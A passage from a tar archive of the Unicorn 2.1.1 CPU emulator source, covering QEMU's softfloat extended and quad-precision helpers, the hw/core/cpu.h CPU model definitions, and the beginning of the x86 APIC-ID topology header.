} static inline int floatx80_is_any_nan(floatx80 a) { return ((a.high & 0x7fff) == 0x7fff) && (a.low<<1); } /*---------------------------------------------------------------------------- | Return whether the given value is an invalid floatx80 encoding. | Invalid floatx80 encodings arise when the integer bit is not set, but | the exponent is not zero. The only times the integer bit is permitted to | be zero is in subnormal numbers and the value zero. | This includes what the Intel software developer's manual calls pseudo-NaNs, | pseudo-infinities and un-normal numbers. It does not include | pseudo-denormals, which must still be correctly handled as inputs even | if they are never generated as outputs. *----------------------------------------------------------------------------*/ static inline bool floatx80_invalid_encoding(floatx80 a) { return (a.low & (1ULL << 63)) == 0 && (a.high & 0x7FFF) != 0; } #define floatx80_zero make_floatx80(0x0000, 0x0000000000000000LL) #define floatx80_one make_floatx80(0x3fff, 0x8000000000000000LL) #define floatx80_ln2 make_floatx80(0x3ffe, 0xb17217f7d1cf79acLL) #define floatx80_pi make_floatx80(0x4000, 0xc90fdaa22168c235LL) #define floatx80_half make_floatx80(0x3ffe, 0x8000000000000000LL) /*---------------------------------------------------------------------------- | Returns the fraction bits of the extended double-precision floating-point | value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloatx80Frac(floatx80 a) { return a.low; } /*---------------------------------------------------------------------------- | Returns the exponent bits of the extended double-precision floating-point | value `a'. *----------------------------------------------------------------------------*/ static inline int32_t extractFloatx80Exp(floatx80 a) { return a.high & 0x7FFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the extended double-precision floating-point value | `a'. *----------------------------------------------------------------------------*/ static inline flag extractFloatx80Sign(floatx80 a) { return a.high >> 15; } /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into an | extended double-precision floating-point value, returning the result. *----------------------------------------------------------------------------*/ static inline floatx80 packFloatx80(flag zSign, int32_t zExp, uint64_t zSig) { floatx80 z; z.low = zSig; z.high = (((uint16_t)zSign) << 15) + zExp; return z; } /*---------------------------------------------------------------------------- | Normalizes the subnormal extended double-precision floating-point value | represented by the denormalized significand `aSig'. The normalized exponent | and significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ void normalizeFloatx80Subnormal(uint64_t aSig, int32_t *zExpPtr, uint64_t *zSigPtr); /*---------------------------------------------------------------------------- | Takes two extended double-precision floating-point values `a' and `b', one | of which is a NaN, and returns the appropriate NaN result. If either `a' or | `b' is a signaling NaN, the invalid exception is raised. *----------------------------------------------------------------------------*/ floatx80 propagateFloatx80NaN(floatx80 a, floatx80 b, float_status *status); /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | rounded and packed into the extended double-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal extended | double-precision floating-point number. | If `roundingPrecision' is 32 or 64, the result is rounded to the same | number of bits as single or double precision, respectively. Otherwise, the | result is rounded to the full precision of the extended double-precision | format. | The input significand must be normalized or smaller. If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding. The | handling of underflow and overflow follows the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 roundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status); /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent | `zExp', and significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. This routine is just like | `roundAndPackFloatx80' except that the input significand does not have to be | normalized. *----------------------------------------------------------------------------*/ floatx80 normalizeRoundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status); /*---------------------------------------------------------------------------- | The pattern for a default generated extended double-precision NaN. *----------------------------------------------------------------------------*/ floatx80 floatx80_default_nan(float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE quadruple-precision conversion routines. *----------------------------------------------------------------------------*/ int32_t float128_to_int32(float128, float_status *status); int32_t float128_to_int32_round_to_zero(float128, float_status *status); int64_t float128_to_int64(float128, float_status *status); int64_t float128_to_int64_round_to_zero(float128, float_status *status); uint64_t float128_to_uint64(float128, float_status *status); uint64_t float128_to_uint64_round_to_zero(float128, float_status *status); uint32_t float128_to_uint32(float128, float_status *status); uint32_t float128_to_uint32_round_to_zero(float128, float_status *status); float32 float128_to_float32(float128, float_status *status); float64 float128_to_float64(float128, float_status *status); floatx80 float128_to_floatx80(float128, float_status *status); /*---------------------------------------------------------------------------- | Software IEC/IEEE quadruple-precision operations. *----------------------------------------------------------------------------*/ float128 float128_round_to_int(float128, float_status *status); float128 float128_add(float128, float128, float_status *status); float128 float128_sub(float128, float128, float_status *status); float128 float128_mul(float128, float128, float_status *status); float128 float128_div(float128, float128, float_status *status); float128 float128_rem(float128, float128, float_status *status); float128 float128_sqrt(float128, float_status *status); int float128_eq(float128, float128, float_status *status); int float128_le(float128, float128, float_status *status); int float128_lt(float128, float128, float_status *status); int float128_unordered(float128, float128, float_status *status); int float128_eq_quiet(float128, float128, float_status *status); int float128_le_quiet(float128, float128, float_status *status); int float128_lt_quiet(float128, float128, float_status *status); int float128_unordered_quiet(float128, float128, float_status *status); int float128_compare(float128, float128, float_status *status); int float128_compare_quiet(float128, float128, float_status *status); int float128_is_quiet_nan(float128, float_status *status); int float128_is_signaling_nan(float128, float_status *status); float128 float128_silence_nan(float128, float_status *status); float128 float128_scalbn(float128, int, float_status *status); static inline float128 float128_abs(float128 a) { a.high &= 0x7fffffffffffffffLL; return a; } static inline float128 float128_chs(float128 a) { a.high ^= 0x8000000000000000LL; return a; } static inline int float128_is_infinity(float128 a) { return (a.high & 0x7fffffffffffffffLL) == 0x7fff000000000000LL && a.low == 0; } static inline int float128_is_neg(float128 a) { return a.high >> 63; } static inline int float128_is_zero(float128 a) { return (a.high & 0x7fffffffffffffffLL) == 0 && a.low == 0; } static inline int float128_is_zero_or_denormal(float128 a) { return (a.high & 0x7fff000000000000LL) == 0; } static inline bool float128_is_normal(float128 a) { return (((a.high >> 48) + 1) & 0x7fff) >= 2; } static inline bool float128_is_denormal(float128 a) { return float128_is_zero_or_denormal(a) && !float128_is_zero(a); } static inline int float128_is_any_nan(float128 a) { return ((a.high >> 48) & 0x7fff) == 0x7fff && ((a.low != 0) || ((a.high & 0xffffffffffffLL) != 0)); } #define float128_zero make_float128(0, 0) /*---------------------------------------------------------------------------- | The pattern for a default generated quadruple-precision NaN. *----------------------------------------------------------------------------*/ float128 float128_default_nan(float_status *status); #endif /* SOFTFLOAT_H */ ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/����������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016214�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/core/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017144�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/core/cpu.h������������������������������������������������������������0000664�0000000�0000000�00000050340�14675241067�0020106�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU CPU model * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #ifndef QEMU_CPU_H #define QEMU_CPU_H #include <stdint.h> #include "exec/hwaddr.h" #include "exec/memattrs.h" #include "qemu/bitmap.h" #include "qemu/queue.h" #include "qemu/thread.h" /** * vaddr: * Type wide enough to contain any #target_ulong virtual address. */ typedef uint64_t vaddr; #define VADDR_PRId PRId64 #define VADDR_PRIu PRIu64 #define VADDR_PRIo PRIo64 #define VADDR_PRIx PRIx64 #define VADDR_PRIX PRIX64 #define VADDR_MAX UINT64_MAX typedef enum MMUAccessType { MMU_DATA_LOAD = 0, MMU_DATA_STORE = 1, MMU_INST_FETCH = 2 } MMUAccessType; typedef struct CPUWatchpoint CPUWatchpoint; struct TranslationBlock; /** * CPUClass: * @class_by_name: Callback to map -cpu command line model name to an * instantiatable CPU type. * @has_work: Callback for checking if there is work to do. * @do_interrupt: Callback for interrupt handling. * @do_unaligned_access: Callback for unaligned access handling, if * the target defines #TARGET_ALIGNED_ONLY. * @do_transaction_failed: Callback for handling failed memory transactions * (ie bus faults or external aborts; not MMU faults) * @get_arch_id: Callback for getting architecture-dependent CPU ID. * @get_paging_enabled: Callback for inquiring whether paging is enabled. * @get_memory_mapping: Callback for obtaining the memory mappings. * @set_pc: Callback for setting the Program Counter register. This * should have the semantics used by the target architecture when * setting the PC from a source such as an ELF file entry point; * for example on Arm it will also set the Thumb mode bit based * on the least significant bit of the new PC value. * If the target behaviour here is anything other than "set * the PC register to the value passed in" then the target must * also implement the synchronize_from_tb hook. * @synchronize_from_tb: Callback for synchronizing state from a TCG * #TranslationBlock. This is called when we abandon execution * of a TB before starting it, and must set all parts of the CPU * state which the previous TB in the chain may not have updated. * This always includes at least the program counter; some targets * will need to do more. If this hook is not implemented then the * default is to call @set_pc(tb->pc). * @tlb_fill: Callback for handling a softmmu tlb miss or user-only * address fault. For system mode, if the access is valid, call * tlb_set_page and return true; if the access is invalid, and * probe is true, return false; otherwise raise an exception and * do not return. For user-only mode, always raise an exception * and do not return. * @get_phys_page_debug: Callback for obtaining a physical address. * @get_phys_page_attrs_debug: Callback for obtaining a physical address and the * associated memory transaction attributes to use for the access. * CPUs which use memory transaction attributes should implement this * instead of get_phys_page_debug. * @asidx_from_attrs: Callback to return the CPU AddressSpace to use for * a memory access with the specified memory transaction attributes. * @debug_check_watchpoint: Callback: return true if the architectural * watchpoint whose address has matched should really fire. * @debug_excp_handler: Callback for handling debug exceptions. * @cpu_exec_enter: Callback for cpu_exec preparation. * @cpu_exec_exit: Callback for cpu_exec cleanup. * @cpu_exec_interrupt: Callback for processing interrupts in cpu_exec. * @adjust_watchpoint_address: Perform a target-specific adjustment to an * address before attempting to match it against watchpoints. * * Represents a CPU family or model. */ typedef struct CPUClass { /* no DeviceClass->reset(), add here. */ void (*reset)(CPUState *cpu); bool (*has_work)(CPUState *cpu); void (*do_interrupt)(CPUState *cpu); void (*do_unaligned_access)(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); int64_t (*get_arch_id)(CPUState *cpu); bool (*get_paging_enabled)(const CPUState *cpu); void (*get_memory_mapping)(CPUState *cpu, MemoryMappingList *list); void (*set_pc)(CPUState *cpu, vaddr value); void (*synchronize_from_tb)(CPUState *cpu, struct TranslationBlock *tb); bool (*tlb_fill)(CPUState *cpu, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); bool (*tlb_fill_cpu)(CPUState *cpu, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); hwaddr (*get_phys_page_debug)(CPUState *cpu, vaddr addr); hwaddr (*get_phys_page_attrs_debug)(CPUState *cpu, vaddr addr, MemTxAttrs *attrs); int (*asidx_from_attrs)(CPUState *cpu, MemTxAttrs attrs); bool (*debug_check_watchpoint)(CPUState *cpu, CPUWatchpoint *wp); void (*debug_excp_handler)(CPUState *cpu); void (*cpu_exec_enter)(CPUState *cpu); void (*cpu_exec_exit)(CPUState *cpu); bool (*cpu_exec_interrupt)(CPUState *cpu, int interrupt_request); vaddr (*adjust_watchpoint_address)(CPUState *cpu, vaddr addr, int len); void (*tcg_initialize)(struct uc_struct *uc); } CPUClass; /* * Low 16 bits: number of cycles left, used only in icount mode. * High 16 bits: Set to -1 to force TCG to stop executing linked TBs * for this CPU and return to its top level loop (even in non-icount mode). * This allows a single read-compare-cbranch-write sequence to test * for both decrementer underflow and exceptions. */ typedef union IcountDecr { uint32_t u32; struct { #ifdef HOST_WORDS_BIGENDIAN uint16_t high; uint16_t low; #else uint16_t low; uint16_t high; #endif } u16; } IcountDecr; typedef struct CPUBreakpoint { vaddr pc; int flags; /* BP_* */ QTAILQ_ENTRY(CPUBreakpoint) entry; } CPUBreakpoint; struct CPUWatchpoint { vaddr vaddr; vaddr len; vaddr hitaddr; MemTxAttrs hitattrs; int flags; /* BP_* */ QTAILQ_ENTRY(CPUWatchpoint) entry; }; #define TB_JMP_CACHE_BITS 12 #define TB_JMP_CACHE_SIZE (1 << TB_JMP_CACHE_BITS) /* work queue */ /* The union type allows passing of 64 bit target pointers on 32 bit * hosts in a single parameter */ typedef union { int host_int; unsigned long host_ulong; void *host_ptr; vaddr target_ptr; } run_on_cpu_data; #define RUN_ON_CPU_HOST_PTR(p) ((run_on_cpu_data){.host_ptr = (p)}) #define RUN_ON_CPU_HOST_INT(i) ((run_on_cpu_data){.host_int = (i)}) #define RUN_ON_CPU_HOST_ULONG(ul) ((run_on_cpu_data){.host_ulong = (ul)}) #define RUN_ON_CPU_TARGET_PTR(v) ((run_on_cpu_data){.target_ptr = (v)}) #define RUN_ON_CPU_NULL RUN_ON_CPU_HOST_PTR(NULL) typedef void (*run_on_cpu_func)(CPUState *cpu, run_on_cpu_data data); struct qemu_work_item; #define CPU_UNSET_NUMA_NODE_ID -1 #define CPU_TRACE_DSTATE_MAX_EVENTS 32 /** * CPUState: * @cpu_index: CPU index (informative). * @cluster_index: Identifies which cluster this CPU is in. * For boards which don't define clusters or for "loose" CPUs not assigned * to a cluster this will be UNASSIGNED_CLUSTER_INDEX; otherwise it will * be the same as the cluster-id property of the CPU object's TYPE_CPU_CLUSTER * QOM parent. * @nr_cores: Number of cores within this CPU package. * @nr_threads: Number of threads within this CPU. * @running: #true if CPU is currently running (lockless). * @has_waiter: #true if a CPU is currently waiting for the cpu_exec_end; * valid under cpu_list_lock. * @created: Indicates whether the CPU thread has been successfully created. * @interrupt_request: Indicates a pending interrupt request. * @halted: Nonzero if the CPU is in suspended state. * @stop: Indicates a pending stop request. * @stopped: Indicates the CPU has been artificially stopped. * @unplug: Indicates a pending CPU unplug request. * @crash_occurred: Indicates the OS reported a crash (panic) for this CPU * @singlestep_enabled: Flags for single-stepping. * @icount_extra: Instructions until next timer event. * @can_do_io: Nonzero if memory-mapped IO is safe. Deterministic execution * requires that IO only be performed on the last instruction of a TB * so that interrupts take effect immediately. * @cpu_ases: Pointer to array of CPUAddressSpaces (which define the * AddressSpaces this CPU has) * @num_ases: number of CPUAddressSpaces in @cpu_ases * @as: Pointer to the first AddressSpace, for the convenience of targets which * only have a single AddressSpace * @env_ptr: Pointer to subclass-specific CPUArchState field. * @icount_decr_ptr: Pointer to IcountDecr field within subclass. * @next_cpu: Next CPU sharing TB cache. * @opaque: User data. * @mem_io_pc: Host Program Counter at which the memory was accessed. * @work_mutex: Lock to prevent multiple access to queued_work_*. * @queued_work_first: First asynchronous work pending. * @trace_dstate_delayed: Delayed changes to trace_dstate (includes all changes * to @trace_dstate). * @trace_dstate: Dynamic tracing state of events for this vCPU (bitmask). * @ignore_memory_transaction_failures: Cached copy of the MachineState * flag of the same name: allows the board to suppress calling of the * CPU do_transaction_failed hook function. * * State of one CPU core or thread. */ struct CPUState { int nr_cores; int nr_threads; struct QemuThread *thread; #ifdef _WIN32 HANDLE hThread; #endif #if 0 int thread_id; bool running, has_waiter; struct QemuCond *halt_cond; bool thread_kicked; #endif bool created; bool stop; bool stopped; bool unplug; bool crash_occurred; bool exit_request; bool in_exclusive_context; uint32_t cflags_next_tb; /* updates protected by BQL */ uint32_t interrupt_request; int singlestep_enabled; int64_t icount_budget; int64_t icount_extra; uint64_t random_seed; sigjmp_buf jmp_env; CPUAddressSpace *cpu_ases; int num_ases; AddressSpace *as; MemoryRegion *memory; void *env_ptr; /* CPUArchState */ IcountDecr *icount_decr_ptr; /* Accessed in parallel; all accesses must be atomic */ struct TranslationBlock *tb_jmp_cache[TB_JMP_CACHE_SIZE]; QTAILQ_ENTRY(CPUState) node; /* ice debug support */ QTAILQ_HEAD(, CPUBreakpoint) breakpoints; QTAILQ_HEAD(, CPUWatchpoint) watchpoints; CPUWatchpoint *watchpoint_hit; void *opaque; /* In order to avoid passing too many arguments to the MMIO helpers, * we store some rarely used information in the CPU context. */ uintptr_t mem_io_pc; /* Used for events with 'vcpu' and *without* the 'disabled' properties */ DECLARE_BITMAP(trace_dstate_delayed, CPU_TRACE_DSTATE_MAX_EVENTS); DECLARE_BITMAP(trace_dstate, CPU_TRACE_DSTATE_MAX_EVENTS); /* TODO Move common fields from CPUArchState here. */ int cpu_index; int cluster_index; uint32_t halted; uint32_t can_do_io; int32_t exception_index; struct uc_struct* uc; /* pointer to CPUArchState.cc */ struct CPUClass *cc; // Set to force TCG to stop executing linked TBs for this // CPU and return to its top level loop. volatile sig_atomic_t tcg_exit_req; }; #define CPU(obj) ((CPUState *)(obj)) #define CPU_CLASS(class) ((CPUClass *)class) #define CPU_GET_CLASS(obj) (((CPUState *)obj)->cc) static inline void cpu_tb_jmp_cache_clear(CPUState *cpu) { unsigned int i; for (i = 0; i < TB_JMP_CACHE_SIZE; i++) { cpu->tb_jmp_cache[i] = NULL; } } /** * cpu_paging_enabled: * @cpu: The CPU whose state is to be inspected. * * Returns: %true if paging is enabled, %false otherwise. */ bool cpu_paging_enabled(const CPUState *cpu); /** * cpu_get_memory_mapping: * @cpu: The CPU whose memory mappings are to be obtained. * @list: Where to write the memory mappings to. */ void cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list); /** * CPUDumpFlags: * @CPU_DUMP_CODE: * @CPU_DUMP_FPU: dump FPU register state, not just integer * @CPU_DUMP_CCOP: dump info about TCG QEMU's condition code optimization state */ enum CPUDumpFlags { CPU_DUMP_CODE = 0x00010000, CPU_DUMP_FPU = 0x00020000, CPU_DUMP_CCOP = 0x00040000, }; /** * cpu_get_phys_page_attrs_debug: * @cpu: The CPU to obtain the physical page address for. * @addr: The virtual address. * @attrs: Updated on return with the memory transaction attributes to use * for this access. * * Obtains the physical page corresponding to a virtual one, together * with the corresponding memory transaction attributes to use for the access. * Use it only for debugging because no protection checks are done. * * Returns: Corresponding physical page address or -1 if no page found. */ static inline hwaddr cpu_get_phys_page_attrs_debug(CPUState *cpu, vaddr addr, MemTxAttrs *attrs) { CPUClass *cc = CPU_GET_CLASS(cpu); if (cc->get_phys_page_attrs_debug) { return cc->get_phys_page_attrs_debug(cpu, addr, attrs); } /* Fallback for CPUs which don't implement the _attrs_ hook */ *attrs = MEMTXATTRS_UNSPECIFIED; return cc->get_phys_page_debug(cpu, addr); } /** * cpu_get_phys_page_debug: * @cpu: The CPU to obtain the physical page address for. * @addr: The virtual address. * * Obtains the physical page corresponding to a virtual one. * Use it only for debugging because no protection checks are done. * * Returns: Corresponding physical page address or -1 if no page found. */ static inline hwaddr cpu_get_phys_page_debug(CPUState *cpu, vaddr addr) { MemTxAttrs attrs = { 0 }; return cpu_get_phys_page_attrs_debug(cpu, addr, &attrs); } /** cpu_asidx_from_attrs: * @cpu: CPU * @attrs: memory transaction attributes * * Returns the address space index specifying the CPU AddressSpace * to use for a memory access with the given transaction attributes. */ static inline int cpu_asidx_from_attrs(CPUState *cpu, MemTxAttrs attrs) { CPUClass *cc = CPU_GET_CLASS(cpu); int ret = 0; if (cc->asidx_from_attrs) { ret = cc->asidx_from_attrs(cpu, attrs); assert(ret < cpu->num_ases && ret >= 0); } return ret; } /** * cpu_reset: * @cpu: The CPU whose state is to be reset. */ void cpu_reset(CPUState *cpu); /** * cpu_has_work: * @cpu: The vCPU to check. * * Checks whether the CPU has work to do. * * Returns: %true if the CPU has work, %false otherwise. */ static inline bool cpu_has_work(CPUState *cpu) { CPUClass *cc = CPU_GET_CLASS(cpu); g_assert(cc->has_work); return cc->has_work(cpu); } /** * cpu_is_stopped: * @cpu: The CPU to check. * * Checks whether the CPU is stopped. * * Returns: %true if run state is not running or if artificially stopped; * %false otherwise. */ bool cpu_is_stopped(CPUState *cpu); typedef void (*CPUInterruptHandler)(CPUState *, int); extern CPUInterruptHandler cpu_interrupt_handler; /** * cpu_interrupt: * @cpu: The CPU to set an interrupt on. * @mask: The interrupts to set. * * Invokes the interrupt handler. */ static inline void cpu_interrupt(CPUState *cpu, int mask) { cpu_interrupt_handler(cpu, mask); } #ifdef NEED_CPU_H static inline void cpu_unaligned_access(CPUState *cpu, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->do_unaligned_access(cpu, addr, access_type, mmu_idx, retaddr); } #endif /* NEED_CPU_H */ /** * cpu_set_pc: * @cpu: The CPU to set the program counter for. * @addr: Program counter value. * * Sets the program counter for a CPU. */ static inline void cpu_set_pc(CPUState *cpu, vaddr addr) { CPUClass *cc = CPU_GET_CLASS(cpu); cc->set_pc(cpu, addr); } /** * cpu_reset_interrupt: * @cpu: The CPU to clear the interrupt on. * @mask: The interrupt mask to clear. * * Resets interrupts on the vCPU @cpu. */ void cpu_reset_interrupt(CPUState *cpu, int mask); /** * cpu_exit: * @cpu: The CPU to exit. * * Requests the CPU @cpu to exit execution. */ void cpu_exit(CPUState *cpu); /** * cpu_resume: * @cpu: The CPU to resume. * * Resumes CPU, i.e. puts CPU into runnable state. */ void cpu_resume(CPUState *cpu); /** * qemu_init_vcpu: * @cpu: The vCPU to initialize. * * Initializes a vCPU. */ void qemu_init_vcpu(CPUState *cpu); #define SSTEP_ENABLE 0x1 /* Enable simulated HW single stepping */ #define SSTEP_NOIRQ 0x2 /* Do not use IRQ while single stepping */ #define SSTEP_NOTIMER 0x4 /* Do not Timers while single stepping */ /* Breakpoint/watchpoint flags */ #define BP_MEM_READ 0x01 #define BP_MEM_WRITE 0x02 #define BP_MEM_ACCESS (BP_MEM_READ | BP_MEM_WRITE) #define BP_STOP_BEFORE_ACCESS 0x04 /* 0x08 currently unused */ #define BP_GDB 0x10 #define BP_CPU 0x20 #define BP_ANY (BP_GDB | BP_CPU) #define BP_WATCHPOINT_HIT_READ 0x40 #define BP_WATCHPOINT_HIT_WRITE 0x80 #define BP_WATCHPOINT_HIT (BP_WATCHPOINT_HIT_READ | BP_WATCHPOINT_HIT_WRITE) int cpu_breakpoint_insert(CPUState *cpu, vaddr pc, int flags, CPUBreakpoint **breakpoint); int cpu_breakpoint_remove(CPUState *cpu, vaddr pc, int flags); void cpu_breakpoint_remove_by_ref(CPUState *cpu, CPUBreakpoint *breakpoint); void cpu_breakpoint_remove_all(CPUState *cpu, int mask); /* Return true if PC matches an installed breakpoint. */ static inline bool cpu_breakpoint_test(CPUState *cpu, vaddr pc, int mask) { CPUBreakpoint *bp; if (unlikely(!QTAILQ_EMPTY(&cpu->breakpoints))) { QTAILQ_FOREACH(bp, &cpu->breakpoints, entry) { if (bp->pc == pc && (bp->flags & mask)) { return true; } } } return false; } int cpu_watchpoint_insert(CPUState *cpu, vaddr addr, vaddr len, int flags, CPUWatchpoint **watchpoint); int cpu_watchpoint_remove(CPUState *cpu, vaddr addr, vaddr len, int flags); void cpu_watchpoint_remove_by_ref(CPUState *cpu, CPUWatchpoint *watchpoint); void cpu_watchpoint_remove_all(CPUState *cpu, int mask); void cpu_check_watchpoint(CPUState *cpu, vaddr addr, vaddr len, MemTxAttrs attrs, int flags, uintptr_t ra); int cpu_watchpoint_address_matches(CPUState *cpu, vaddr addr, vaddr len); /** * cpu_get_address_space: * @cpu: CPU to get address space from * @asidx: index identifying which address space to get * * Return the requested address space of this CPU. @asidx * specifies which address space to read. */ AddressSpace *cpu_get_address_space(CPUState *cpu, int asidx); void QEMU_NORETURN cpu_abort(CPUState *cpu, const char *fmt, ...) GCC_FMT_ATTR(2, 3); void cpu_exec_initfn(CPUState *cpu); void cpu_exec_realizefn(CPUState *cpu); void cpu_exec_unrealizefn(CPUState *cpu); /** * target_words_bigendian: * Returns true if the (default) endianness of the target is big endian, * false otherwise. Note that in target-specific code, you can use * TARGET_WORDS_BIGENDIAN directly instead. On the other hand, common * code should normally never need to know about the endianness of the * target, so please do *not* use this function unless you know very well * what you are doing! */ bool target_words_bigendian(void); /* use original func name. */ void cpu_class_init(struct uc_struct *uc, CPUClass *k); void cpu_common_initfn(struct uc_struct *uc, CPUState *cs); void cpu_stop(struct uc_struct *uc); #define UNASSIGNED_CPU_INDEX -1 #define UNASSIGNED_CLUSTER_INDEX -1 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/i386/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016705�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/i386/topology.h�������������������������������������������������������0000664�0000000�0000000�00000022651�14675241067�0020740�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 CPU topology data structures and functions * * Copyright (c) 2012 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef HW_I386_TOPOLOGY_H #define HW_I386_TOPOLOGY_H /* This file implements the APIC-ID-based CPU topology enumeration logic, * documented at the following document: * Intel® 64 Architecture Processor Topology Enumeration * http://software.intel.com/en-us/articles/intel-64-architecture-processor-topology-enumeration/ * * This code should be compatible with AMD's "Extended Method" described at: * AMD CPUID Specification (Publication #25481) * Section 3: Multiple Core Calcuation * as long as: * nr_threads is set to 1; * OFFSET_IDX is assumed to be 0; * CPUID Fn8000_0008_ECX[ApicIdCoreIdSize[3:0]] is set to apicid_core_width(). */ #include "qemu/bitops.h" /* APIC IDs can be 32-bit, but beware: APIC IDs > 255 require x2APIC support */ typedef uint32_t apic_id_t; typedef struct X86CPUTopoIDs { unsigned pkg_id; unsigned node_id; unsigned die_id; unsigned core_id; unsigned smt_id; } X86CPUTopoIDs; typedef struct X86CPUTopoInfo { unsigned nodes_per_pkg; unsigned dies_per_pkg; unsigned cores_per_die; unsigned threads_per_core; } X86CPUTopoInfo; /* Return the bit width needed for 'count' IDs */ static unsigned apicid_bitwidth_for_count(unsigned count) { g_assert(count >= 1); count -= 1; return count ? 32 - clz32(count) : 0; } /* Bit width of the SMT_ID (thread ID) field on the APIC ID */ static inline unsigned apicid_smt_width(X86CPUTopoInfo *topo_info) { return apicid_bitwidth_for_count(topo_info->threads_per_core); } /* Bit width of the Core_ID field */ static inline unsigned apicid_core_width(X86CPUTopoInfo *topo_info) { return apicid_bitwidth_for_count(topo_info->cores_per_die); } /* Bit width of the Die_ID field */ static inline unsigned apicid_die_width(X86CPUTopoInfo *topo_info) { return apicid_bitwidth_for_count(topo_info->dies_per_pkg); } /* Bit width of the node_id field per socket */ static inline unsigned apicid_node_width_epyc(X86CPUTopoInfo *topo_info) { return apicid_bitwidth_for_count(MAX(topo_info->nodes_per_pkg, 1)); } /* Bit offset of the Core_ID field */ static inline unsigned apicid_core_offset(X86CPUTopoInfo *topo_info) { return apicid_smt_width(topo_info); } /* Bit offset of the Die_ID field */ static inline unsigned apicid_die_offset(X86CPUTopoInfo *topo_info) { return apicid_core_offset(topo_info) + apicid_core_width(topo_info); } /* Bit offset of the Pkg_ID (socket ID) field */ static inline unsigned apicid_pkg_offset(X86CPUTopoInfo *topo_info) { return apicid_die_offset(topo_info) + apicid_die_width(topo_info); } #define NODE_ID_OFFSET 3 /* Minimum node_id offset if numa configured */ /* * Bit offset of the node_id field * * Make sure nodes_per_pkg > 0 if numa configured else zero. */ static inline unsigned apicid_node_offset_epyc(X86CPUTopoInfo *topo_info) { unsigned offset = apicid_die_offset(topo_info) + apicid_die_width(topo_info); if (topo_info->nodes_per_pkg) { return MAX(NODE_ID_OFFSET, offset); } else { return offset; } } /* Bit offset of the Pkg_ID (socket ID) field */ static inline unsigned apicid_pkg_offset_epyc(X86CPUTopoInfo *topo_info) { return 